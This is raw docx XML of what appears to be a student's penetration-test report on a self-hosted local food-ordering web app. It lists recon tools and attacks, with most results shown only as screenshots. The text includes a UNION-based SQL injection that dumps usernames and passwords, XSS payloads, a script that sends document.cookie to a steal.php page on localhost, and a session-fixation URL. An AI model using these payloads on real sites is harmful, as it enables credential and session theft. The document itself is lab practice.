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2148F8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Self Hosted Web Application Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680ADF15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226C10C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E772494">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Recon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.)Nmap</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="270891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458210"/>
            <wp:effectExtent l="0" t="0" r="190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74975"/>
            <wp:effectExtent l="0" t="0" r="444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94050"/>
            <wp:effectExtent l="0" t="0" r="190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D541D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2912110"/>
            <wp:effectExtent l="0" t="0" r="190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06695"/>
            <wp:effectExtent l="0" t="0" r="381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CDCD5"/>
    <w:p w14:paraId="375C62A9"/>
    <w:p w14:paraId="15FBB6BB"/>
    <w:p w14:paraId="144567E4"/>
    <w:p w14:paraId="29F2E72F"/>
    <w:p w14:paraId="17639264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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)Whatweb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A60A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14116BDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="146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B86B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0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                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE03D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>4.)searchsploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="5094605"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1079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E179">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DEBAD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>)sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="6379210"/>
            <wp:effectExtent l="0" t="0" r="444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7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341745"/>
            <wp:effectExtent l="0" t="0" r="1905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4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E67F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pP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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>6.)Sql Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4098925"/>
            <wp:effectExtent l="0" t="0" r="444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6FBED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1670685"/>
            <wp:effectExtent l="0" t="0" r="508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8C7B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="582D174C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DFAB20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7518C557">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D0492D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECB62C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534A31E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B1D904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B107E32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C147D34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479B355F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT null, username, password, email FROM userss limit 2 -- ' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9A26A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4046855" cy="3608705"/>
            <wp:effectExtent l="0" t="0" r="698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ED0FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FACC83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4010660" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="1270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A3F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D37436">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A97CB09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DD5E85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657B86EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CCB6A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE3C980">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787CA167">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B9C57E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB8FF93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643A37B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413008BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E83AE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E151BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188EFE33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) XSS Attack</w:t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t>Username :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert("XSS Attack!")&lt;/script&gt;</w:t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t>Password  :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scam</w:t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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3912870"/>
            <wp:effectExtent l="0" t="0" r="1905" b="381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25650"/>
            <wp:effectExtent l="0" t="0" r="14605" b="127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</w:p>
    <w:p w14:paraId="24D9FF5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72245FFA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23B232DB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19946E5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Username :</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.location="http://localhost/Projects/Rough/Malicious.html"&lt;/script&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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t>Password  :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388183CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE7BE29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="4088130"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1143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73040" cy="2905125"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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D44ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1829D3B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784225"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8255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2245" cy="2378075"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1460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C01AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67354038">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099DDB75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)Cookie Stealing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9F666">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pP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t>&lt;script&gt; fetch("http://localhost/Projects/Rough/steal.php?cookie= "+ document.cookie); &lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="4210050"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1143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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257800" cy="1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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376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909445"/>
            <wp:effectExtent l="0" t="0" r="635" b="1079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73040" cy="3855085"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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ABC71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E90DDF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FB5BAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA49098">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF442A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F34390C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E4F2EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64711887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)Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B028A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0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71770" cy="1801495"/>
            <wp:effectExtent l="0" t="0" r="1270" b="12065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2245" cy="2662555"/>
            <wp:effectExtent l="0" t="0" r="10795" b="4445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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>8.)Session Fixation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>http://localhost/Projects/Food%20App/login.php?PHPSESSID=1234</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2568575"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6985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9230" cy="2417445"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715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70500" cy="2883535"/>
            <wp:effectExtent l="0" t="0" r="2540" b="12065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3515" cy="2488565"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10795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 w14:paraId="325D4C76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="584F767D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460AB409">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1D6EA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8804A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06DC08B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D654B5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7625BFC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAA55F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F34ADCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D3C373">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796B5D1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D513FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B7F7C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38407D63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF00BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525D23A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DADF29F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0092457A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6ABB4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B12D6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104926E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>9.)Denial Of service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3F566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="230702A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3216275"/>
            <wp:effectExtent l="0" t="0" r="0" b="14605"/>
            <wp:docPr id="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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="2760980"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12700"/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971D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4EC399">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
